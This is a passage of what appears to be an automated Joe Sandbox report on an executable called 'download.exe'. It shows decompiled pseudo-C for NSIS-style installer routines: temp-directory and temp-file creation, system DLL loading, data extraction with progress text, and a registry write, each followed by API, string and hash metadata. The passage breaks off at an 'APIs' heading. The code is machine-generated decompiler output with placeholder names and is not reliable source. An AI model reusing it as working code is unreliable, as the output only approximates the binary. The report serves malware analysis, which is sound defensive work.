                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 73%
                                                      			E00401D9B(intOrPtr __edx) {
                                                      				void* __esi;
                                                      				int _t9;
                                                      				signed char _t15;
                                                      				struct HFONT__* _t18;
                                                      				intOrPtr _t30;
                                                      				struct HDC__* _t31;
                                                      				void* _t33;
                                                      				void* _t35;
                                                      
                                                      				_t30 = __edx;
                                                      				_t31 = GetDC( *(_t35 - 8));
                                                      				_t9 = E00402AA9(2);
                                                      				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
                                                      				0x40b7e8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                      				ReleaseDC( *(_t35 - 8), _t31);
                                                      				 *0x40b7f8 = E00402AA9(3);
                                                      				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                      				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
                                                      				 *0x40b7ff = 1;
                                                      				 *0x40b7fc = _t15 & 0x00000001;
                                                      				 *0x40b7fd = _t15 & 0x00000002;
                                                      				 *0x40b7fe = _t15 & 0x00000004;
                                                      				E00405F9F(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x24)));
                                                      				_t18 = CreateFontIndirectA(0x40b7e8); // executed
                                                      				_push(_t18);
                                                      				_push(_t33);
                                                      				E00405EDB();
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t35 - 4));
                                                      				return 0;
                                                      			}












                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401D9E
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                                      • CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E20
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID: Times New Roman
                                                      • API String ID: 3808545654-927190056
                                                      • Opcode ID: 59217911188accf6f2e31d03a92226d57be6280b8a76530822411e1e331ee477
                                                      • Instruction ID: 2ad56a654efc6cf1735b667c3c7d9d5e2d080a44a70240ddf1560951203afcdd
                                                      • Opcode Fuzzy Hash: 59217911188accf6f2e31d03a92226d57be6280b8a76530822411e1e331ee477
                                                      • Instruction Fuzzy Hash: BE01B171944242AFE7015BB1AE4AB9A7FB4DB95305F10443AF251BB2E2CB7800459F6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 897 40556a-4055b5 CreateDirectoryA 898 4055b7-4055b9 897->898 899 4055bb-4055c8 GetLastError 897->899 900 4055e2-4055e4 898->900 899->900 901 4055ca-4055de SetFileSecurityA 899->901 901->898 902 4055e0 GetLastError 901->902 902->900
                                                      C-Code - Quality: 100%
                                                      			E0040556A(CHAR* _a4) {
                                                      				struct _SECURITY_ATTRIBUTES _v16;
                                                      				struct _SECURITY_DESCRIPTOR _v36;
                                                      				int _t22;
                                                      				long _t23;
                                                      
                                                      				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                      				_v36.Owner = 0x40837c;
                                                      				_v36.Group = 0x40837c;
                                                      				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                      				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                      				_v16.lpSecurityDescriptor =  &_v36;
                                                      				_v36.Revision = 1;
                                                      				_v36.Control = 4;
                                                      				_v36.Dacl = 0x40836c;
                                                      				_v16.nLength = 0xc;
                                                      				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                      				if(_t22 != 0) {
                                                      					L1:
                                                      					return 0;
                                                      				}
                                                      				_t23 = GetLastError();
                                                      				if(_t23 == 0xb7) {
                                                      					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                      						goto L1;
                                                      					}
                                                      					return GetLastError();
                                                      				}
                                                      				return _t23;
                                                      			}








                                                      APIs
                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055AD
                                                      • GetLastError.KERNEL32 ref: 004055C1
                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055D6
                                                      • GetLastError.KERNEL32 ref: 004055E0
                                                      Strings
                                                      • C:\Users\user\Desktop, xrefs: 0040556A
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405590
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                      • API String ID: 3449924974-26219170
                                                      • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                      • Instruction ID: 8e14915602655dbf828c4b629b8158281e3d0c3d6c971d66ca898635d28fe6e6
                                                      • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                      • Instruction Fuzzy Hash: D2010871C00219EAEF019BA1CD087EFBBB9EF14354F10803AD545B6290D77896498FA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 903 4062a7-4062c7 GetSystemDirectoryA 904 4062c9 903->904 905 4062cb-4062cd 903->905 904->905 906 4062dd-4062df 905->906 907 4062cf-4062d7 905->907 909 4062e0-406312 wsprintfA LoadLibraryExA 906->909 907->906 908 4062d9-4062db 907->908 908->909
                                                      C-Code - Quality: 100%
                                                      			E004062A7(intOrPtr _a4) {
                                                      				char _v292;
                                                      				int _t10;
                                                      				struct HINSTANCE__* _t14;
                                                      				void* _t16;
                                                      				void* _t21;
                                                      
                                                      				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                      				if(_t10 > 0x104) {
                                                      					_t10 = 0;
                                                      				}
                                                      				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                      					_t16 = 1;
                                                      				} else {
                                                      					_t16 = 0;
                                                      				}
                                                      				_t5 = _t16 + 0x40a014; // 0x5c
                                                      				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                      				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                      				return _t14;
                                                      			}









                                                      APIs
                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062BE
                                                      • wsprintfA.USER32 ref: 004062F7
                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040630B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                      • String ID: %s%s.dll$UXTHEME$\
                                                      • API String ID: 2200240437-4240819195
                                                      • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                      • Instruction ID: 791f79d561c984125f31c7fb7d360261de965b4457e35f8f8c4567f5ddaa11b7
                                                      • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                      • Instruction Fuzzy Hash: F0F0F630500619ABEB14AB64DD0EFEB375CAB08305F1405BEA686E10C1EAB8D8358B6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 910 402f9c-402fb0 911 402fb2 910->911 912 402fb9-402fc2 910->912 911->912 913 402fc4 912->913 914 402fcb-402fd0 912->914 913->914 915 402fe0-402fed call 40318b 914->915 916 402fd2-402fdb call 4031a1 914->916 920 402ff3-402ff7 915->920 921 403179 915->921 916->915 922 403124-403126 920->922 923 402ffd-403023 GetTickCount 920->923 924 40317b-40317c 921->924 925 403166-403169 922->925 926 403128-40312b 922->926 927 403181 923->927 928 403029-403031 923->928 929 403184-403188 924->929 933 40316b 925->933 934 40316e-403177 call 40318b 925->934 926->927 930 40312d 926->930 927->929 931 403033 928->931 932 403036-403044 call 40318b 928->932 936 403130-403136 930->936 931->932 932->921 944 40304a-403053 932->944 933->934 934->921 942 40317e 934->942 939 403138 936->939 940 40313a-403148 call 40318b 936->940 939->940 940->921 947 40314a-40314f call 405bbd 940->947 942->927 946 403059-403079 call 40643a 944->946 952 40311c-40311e 946->952 953 40307f-403092 GetTickCount 946->953 951 403154-403156 947->951 954 403120-403122 951->954 955 403158-403162 951->955 952->924 956 403094-40309c 953->956 957 4030d7-4030d9 953->957 954->924 955->936 960 403164 955->960 961 4030a4-4030d4 MulDiv wsprintfA call 4050a4 956->961 962 40309e-4030a2 956->962 958 403110-403114 957->958 959 4030db-4030df 957->959 958->928 966 40311a 958->966 964 4030e1-4030e8 call 405bbd 959->964 965 4030f6-403101 959->965 960->927 961->957 962->957 962->961 970 4030ed-4030ef 964->970 969 403104-403108 965->969 966->927 969->946 971 40310e 969->971 970->954 972 4030f1-4030f4 970->972 971->927 972->969
                                                      C-Code - Quality: 95%
                                                      			E00402F9C(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                      				signed int _v8;
                                                      				int _v12;
                                                      				intOrPtr _v16;
                                                      				long _v20;
                                                      				intOrPtr _v24;
                                                      				char _v88;
                                                      				void* _t65;
                                                      				void* _t69;
                                                      				long _t70;
                                                      				intOrPtr _t74;
                                                      				long _t75;
                                                      				intOrPtr _t76;
                                                      				void* _t77;
                                                      				int _t87;
                                                      				intOrPtr _t89;
                                                      				intOrPtr _t91;
                                                      				intOrPtr _t94;
                                                      				long _t95;
                                                      				signed int _t96;
                                                      				int _t97;
                                                      				int _t98;
                                                      				intOrPtr _t99;
                                                      				void* _t100;
                                                      				void* _t101;
                                                      
                                                      				_t96 = _a16;
                                                      				_t91 = _a12;
                                                      				_v12 = _t96;
                                                      				if(_t91 == 0) {
                                                      					_v12 = 0x8000;
                                                      				}
                                                      				_v8 = _v8 & 0x00000000;
                                                      				_v16 = _t91;
                                                      				if(_t91 == 0) {
                                                      					_v16 = 0x78e0f8;
                                                      				}
                                                      				_t62 = _a4;
                                                      				if(_a4 >= 0) {
                                                      					_t89 =  *0x7a2fb8; // 0x410de
                                                      					E004031A1(_t89 + _t62);
                                                      				}
                                                      				if(E0040318B( &_a16, 4) == 0) {
                                                      					L41:
                                                      					_push(0xfffffffd);
                                                      					goto L42;
                                                      				} else {
                                                      					if((_a19 & 0x00000080) == 0) {
                                                      						if(_t91 != 0) {
                                                      							if(_a16 < _t96) {
                                                      								_t96 = _a16;
                                                      							}
                                                      							if(E0040318B(_t91, _t96) != 0) {
                                                      								_v8 = _t96;
                                                      								L44:
                                                      								return _v8;
                                                      							} else {
                                                      								goto L41;
                                                      							}
                                                      						}
                                                      						if(_a16 <= _t91) {
                                                      							goto L44;
                                                      						}
                                                      						_t87 = _v12;
                                                      						while(1) {
                                                      							_t97 = _a16;
                                                      							if(_a16 >= _t87) {
                                                      								_t97 = _t87;
                                                      							}
                                                      							if(E0040318B(0x78a0f8, _t97) == 0) {
                                                      								goto L41;
                                                      							}
                                                      							_t69 = E00405BBD(_a8, 0x78a0f8, _t97); // executed
                                                      							if(_t69 == 0) {
                                                      								L28:
                                                      								_push(0xfffffffe);
                                                      								L42:
                                                      								_pop(_t65);
                                                      								return _t65;
                                                      							}
                                                      							_v8 = _v8 + _t97;
                                                      							_a16 = _a16 - _t97;
                                                      							if(_a16 > 0) {
                                                      								continue;
                                                      							}
                                                      							goto L44;
                                                      						}
                                                      						goto L41;
                                                      					}
                                                      					_t70 = GetTickCount();
                                                      					 *0x40b858 =  *0x40b858 & 0x00000000;
                                                      					_t14 =  &_a16;
                                                      					 *_t14 = _a16 & 0x7fffffff;
                                                      					_v20 = _t70;
                                                      					 *0x40b840 = 0xb;
                                                      					_a4 = _a16;
                                                      					if( *_t14 <= 0) {
                                                      						goto L44;
                                                      					} else {
                                                      						goto L9;
                                                      					}
                                                      					while(1) {
                                                      						L9:
                                                      						_t98 = 0x4000;
                                                      						if(_a16 < 0x4000) {
                                                      							_t98 = _a16;
                                                      						}
                                                      						if(E0040318B(0x78a0f8, _t98) == 0) {
                                                      							goto L41;
                                                      						}
                                                      						_a16 = _a16 - _t98;
                                                      						 *0x40b830 = 0x78a0f8;
                                                      						 *0x40b834 = _t98;
                                                      						while(1) {
                                                      							_t94 = _v16;
                                                      							 *0x40b838 = _t94;
                                                      							 *0x40b83c = _v12;
                                                      							_t74 = E0040643A(0x40b830);
                                                      							_v24 = _t74;
                                                      							if(_t74 < 0) {
                                                      								break;
                                                      							}
                                                      							_t99 =  *0x40b838; // 0x790ef8
                                                      							_t100 = _t99 - _t94;
                                                      							_t75 = GetTickCount();
                                                      							_t95 = _t75;
                                                      							if(( *0x7a3014 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
                                                      								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                      								_t101 = _t101 + 0xc;
                                                      								E004050A4(0,  &_v88);
                                                      								_v20 = _t95;
                                                      							}
                                                      							if(_t100 == 0) {
                                                      								if(_a16 > 0) {
                                                      									goto L9;
                                                      								}
                                                      								goto L44;
                                                      							} else {
                                                      								if(_a12 != 0) {
                                                      									_t76 =  *0x40b838; // 0x790ef8
                                                      									_v8 = _v8 + _t100;
                                                      									_v12 = _v12 - _t100;
                                                      									_v16 = _t76;
                                                      									L23:
                                                      									if(_v24 != 4) {
                                                      										continue;
                                                      									}
                                                      									goto L44;
                                                      								}
                                                      								_t77 = E00405BBD(_a8, _v16, _t100); // executed
                                                      								if(_t77 == 0) {
                                                      									goto L28;
                                                      								}
                                                      								_v8 = _v8 + _t100;
                                                      								goto L23;
                                                      							}
                                                      						}
                                                      						_push(0xfffffffc);
                                                      						goto L42;
                                                      					}
                                                      					goto L41;
                                                      				}
                                                      			}




























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CountTick$wsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 551687249-2449383134
                                                      • Opcode ID: b11fd70d94a81fe884c456641f4daf6d98b7f28d8fc69cfe95d6e3ccae84ae35
                                                      • Instruction ID: a5b3666d5e6f2648317cea794876ab8fd5a8a7e10cba6e045702c7ef747b340d
                                                      • Opcode Fuzzy Hash: b11fd70d94a81fe884c456641f4daf6d98b7f28d8fc69cfe95d6e3ccae84ae35
                                                      • Instruction Fuzzy Hash: A6518E72901219ABCF10DF65DA44A9F7BB8EF08756F14413BE900BB2D0C7789E51CBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 973 405b45-405b4f 974 405b50-405b7b GetTickCount GetTempFileNameA 973->974 975 405b8a-405b8c 974->975 976 405b7d-405b7f 974->976 978 405b84-405b87 975->978 976->974 977 405b81 976->977 977->978
                                                      C-Code - Quality: 100%
                                                      			E00405B45(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                      				char _t11;
                                                      				signed int _t12;
                                                      				int _t15;
                                                      				signed int _t17;
                                                      				void* _t20;
                                                      				CHAR* _t21;
                                                      
                                                      				_t21 = _a4;
                                                      				_t20 = 0x64;
                                                      				while(1) {
                                                      					_t11 =  *0x40a3b4; // 0x61736e
                                                      					_t20 = _t20 - 1;
                                                      					_a4 = _t11;
                                                      					_t12 = GetTickCount();
                                                      					_t17 = 0x1a;
                                                      					_a6 = _a6 + _t12 % _t17;
                                                      					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                      					if(_t15 != 0) {
                                                      						break;
                                                      					}
                                                      					if(_t20 != 0) {
                                                      						continue;
                                                      					}
                                                      					 *_t21 =  *_t21 & 0x00000000;
                                                      					return _t15;
                                                      				}
                                                      				return _t21;
                                                      			}










                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405B59
                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B73
                                                      Strings
                                                      • nsa, xrefs: 00405B50
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B48
                                                      • "C:\Users\user\Desktop\download.exe", xrefs: 00405B45
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: "C:\Users\user\Desktop\download.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-4026104539
                                                      • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                      • Instruction ID: e9fbc8f02783c34a78cbc278a62deb557e4d22a3c76f63b2365399c79cbf5e20
                                                      • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                      • Instruction Fuzzy Hash: A0F082363042086BDB109F56ED04BAB7BA9DFA1760F14803BFA489B280D6B4A9548B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E706B16DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				void _v36;
                                                      				char _v88;
                                                      				struct HINSTANCE__* _t37;
                                                      				intOrPtr _t42;
                                                      				void* _t48;
                                                      				void* _t49;
                                                      				void* _t50;
                                                      				void* _t54;
                                                      				intOrPtr _t57;
                                                      				signed int _t61;
                                                      				signed int _t63;
                                                      				void* _t67;
                                                      				void* _t68;
                                                      				void* _t72;
                                                      				void* _t76;
                                                      
                                                      				_t76 = __esi;
                                                      				_t68 = __edi;
                                                      				_t67 = __edx;
                                                      				 *0x706b405c = _a8;
                                                      				 *0x706b4060 = _a16;
                                                      				 *0x706b4064 = _a12;
                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x706b4038, E706B1556);
                                                      				_push(1); // executed
                                                      				_t37 = E706B1A98(); // executed
                                                      				_t54 = _t37;
                                                      				if(_t54 == 0) {
                                                      					L28:
                                                      					return _t37;
                                                      				} else {
                                                      					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                      						E706B226F(_t54);
                                                      					}
                                                      					E706B22B1(_t67, _t54);
                                                      					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                      					if(_t57 == 0xffffffff) {
                                                      						L14:
                                                      						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
                                                      							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                      								_t37 = E706B2498(_t54);
                                                      							} else {
                                                      								_push(_t76);
                                                      								_push(_t68);
                                                      								_t61 = 8;
                                                      								_t13 = _t54 + 0x818; // 0x818
                                                      								memcpy( &_v36, _t13, _t61 << 2);
                                                      								_t42 = E706B156B(_t54,  &_v88);
                                                      								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
                                                      								_t18 = _t54 + 0x818; // 0x818
                                                      								_t72 = _t18;
                                                      								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
                                                      								 *_t72 = 3;
                                                      								E706B2498(_t54);
                                                      								_t63 = 8;
                                                      								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                      							}
                                                      						} else {
                                                      							E706B2498(_t54);
                                                      							_t37 = GlobalFree(E706B1266(E706B1559(_t54)));
                                                      						}
                                                      						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                      							_t37 = E706B245E(_t54);
                                                      							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                      								_t37 =  *(_t54 + 0x808);
                                                      								if(_t37 != 0) {
                                                      									_t37 = FreeLibrary(_t37);
                                                      								}
                                                      							}
                                                      							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
                                                      								_t37 = E706B14E2( *0x706b4058);
                                                      							}
                                                      						}
                                                      						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
                                                      							goto L28;
                                                      						} else {
                                                      							return GlobalFree(_t54);
                                                      						}
                                                      					}
                                                      					_t48 =  *_t54;
                                                      					if(_t48 == 0) {
                                                      						if(_t57 != 1) {
                                                      							goto L14;
                                                      						}
                                                      						E706B2C83(_t54);
                                                      						L12:
                                                      						_t54 = _t48;
                                                      						L13:
                                                      						goto L14;
                                                      					}
                                                      					_t49 = _t48 - 1;
                                                      					if(_t49 == 0) {
                                                      						L8:
                                                      						_t48 = E706B29F8(_t57, _t54); // executed
                                                      						goto L12;
                                                      					}
                                                      					_t50 = _t49 - 1;
                                                      					if(_t50 == 0) {
                                                      						E706B2672(_t54);
                                                      						goto L13;
                                                      					}
                                                      					if(_t50 != 1) {
                                                      						goto L14;
                                                      					}
                                                      					goto L8;
                                                      				}
                                                      			}



















                                                      APIs
                                                        • Part of subcall function 706B1A98: GlobalFree.KERNEL32(?), ref: 706B1CE7
                                                        • Part of subcall function 706B1A98: GlobalFree.KERNEL32(?), ref: 706B1CEC
                                                        • Part of subcall function 706B1A98: GlobalFree.KERNEL32(?), ref: 706B1CF1
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B1786
                                                      • FreeLibrary.KERNEL32(?), ref: 706B1809
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B182E
                                                        • Part of subcall function 706B226F: GlobalAlloc.KERNEL32(00000040,?), ref: 706B22A0
                                                        • Part of subcall function 706B2672: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,706B1757,00000000), ref: 706B2742
                                                        • Part of subcall function 706B156B: wsprintfA.USER32 ref: 706B1599
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                      • String ID:
                                                      • API String ID: 3962662361-3916222277
                                                      • Opcode ID: 823b0e4e18a9f4268ea2859f8886292012b1a83f0130fea1d2d61ef45dfba692
                                                      • Instruction ID: 5be67cbce42aa45c9ace839a85accce3ed524eedc5a12fcff78b6ed371b218bd
                                                      • Opcode Fuzzy Hash: 823b0e4e18a9f4268ea2859f8886292012b1a83f0130fea1d2d61ef45dfba692
                                                      • Instruction Fuzzy Hash: 764180F2100249AACB41AF64CDA5BDD37EEBB05210FB48538F9069E2D6DF789545C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 59%
                                                      			E00401C0A(intOrPtr __edx) {
                                                      				int _t29;
                                                      				long _t30;
                                                      				signed int _t32;
                                                      				CHAR* _t35;
                                                      				long _t36;
                                                      				int _t41;
                                                      				signed int _t42;
                                                      				int _t46;
                                                      				int _t56;
                                                      				intOrPtr _t57;
                                                      				struct HWND__* _t61;
                                                      				void* _t64;
                                                      
                                                      				_t57 = __edx;
                                                      				_t29 = E00402AA9(3);
                                                      				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                                                      				 *(_t64 - 8) = _t29;
                                                      				_t30 = E00402AA9(4);
                                                      				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                                                      				 *(_t64 + 8) = _t30;
                                                      				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                      					 *((intOrPtr*)(__ebp - 8)) = E00402ACB(0x33);
                                                      				}
                                                      				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                      				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                      					 *(_t64 + 8) = E00402ACB(0x44);
                                                      				}
                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                      				_push(1);
                                                      				if(__eflags != 0) {
                                                      					_t59 = E00402ACB();
                                                      					_t32 = E00402ACB();
                                                      					asm("sbb ecx, ecx");
                                                      					asm("sbb eax, eax");
                                                      					_t35 =  ~( *_t31) & _t59;
                                                      					__eflags = _t35;
                                                      					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                                                      					goto L10;
                                                      				} else {
                                                      					_t61 = E00402AA9();
                                                      					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                                                      					_t41 = E00402AA9(2);
                                                      					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                                                      					_t56 =  *(_t64 - 0x14) >> 2;
                                                      					if(__eflags == 0) {
                                                      						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                      						L10:
                                                      						 *(_t64 - 0xc) = _t36;
                                                      					} else {
                                                      						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                      						asm("sbb eax, eax");
                                                      						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                      					}
                                                      				}
                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                      				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                      					_push( *(_t64 - 0xc));
                                                      					E00405EDB();
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t64 - 4));
                                                      				return 0;
                                                      			}
















                                                      APIs
                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 923bedeed5d7b8d7984d68c2ba9ede72919c9759eaf6e2c39352329f0efb5f52
                                                      • Instruction ID: 435bc4df3b74c2d8df546d11ce2c7183e26475550abba04b2436001ae32cf151
                                                      • Opcode Fuzzy Hash: 923bedeed5d7b8d7984d68c2ba9ede72919c9759eaf6e2c39352329f0efb5f52
                                                      • Instruction Fuzzy Hash: 4B21A271E44209BEEF15DFA5D986AAD7BB4EF84304F24843EF501B61E0CB7885418F28
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 83%
                                                      			E004023D6(void* __eax, int __ebx, intOrPtr __edx) {
                                                      				void* _t18;
                                                      				void* _t19;
                                                      				int _t22;
                                                      				long _t23;
                                                      				int _t28;
                                                      				intOrPtr _t31;
                                                      				void* _t32;
                                                      				intOrPtr _t35;
                                                      				void* _t37;
                                                      				void* _t40;
                                                      
                                                      				_t31 = __edx;
                                                      				_t28 = __ebx;
                                                      				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                      				_t32 = __eax;
                                                      				 *(_t37 - 0x3c) =  *(_t37 - 0x14);
                                                      				 *(_t37 - 0x34) = E00402ACB(2);
                                                      				_t18 = E00402ACB(0x11);
                                                      				 *(_t37 - 4) = 1;
                                                      				_t19 = E00402B5B(_t40, _t32, _t18, 2); // executed
                                                      				 *(_t37 + 8) = _t19;
                                                      				if(_t19 != __ebx) {
                                                      					_t22 = 0;
                                                      					if(_t35 == 1) {
                                                      						E00402ACB(0x23);
                                                      						_t22 = lstrlenA(0x40abe8) + 1;
                                                      					}
                                                      					if(_t35 == 4) {
                                                      						 *0x40abe8 = E00402AA9(3);
                                                      						 *((intOrPtr*)(_t37 - 0x80)) = _t31;
                                                      						_t22 = _t35;
                                                      					}
                                                      					if(_t35 == 3) {
                                                      						_t22 = E00402F9C( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40abe8, 0xc00); // executed
                                                      					}
                                                      					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t28,  *(_t37 - 0x3c), 0x40abe8, _t22); // executed
                                                      					if(_t23 == 0) {
                                                      						 *(_t37 - 4) = _t28;
                                                      					}
                                                      					_push( *(_t37 + 8));
                                                      					RegCloseKey(); // executed
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *(_t37 - 4);
                                                      				return 0;
                                                      			}














                                                      APIs
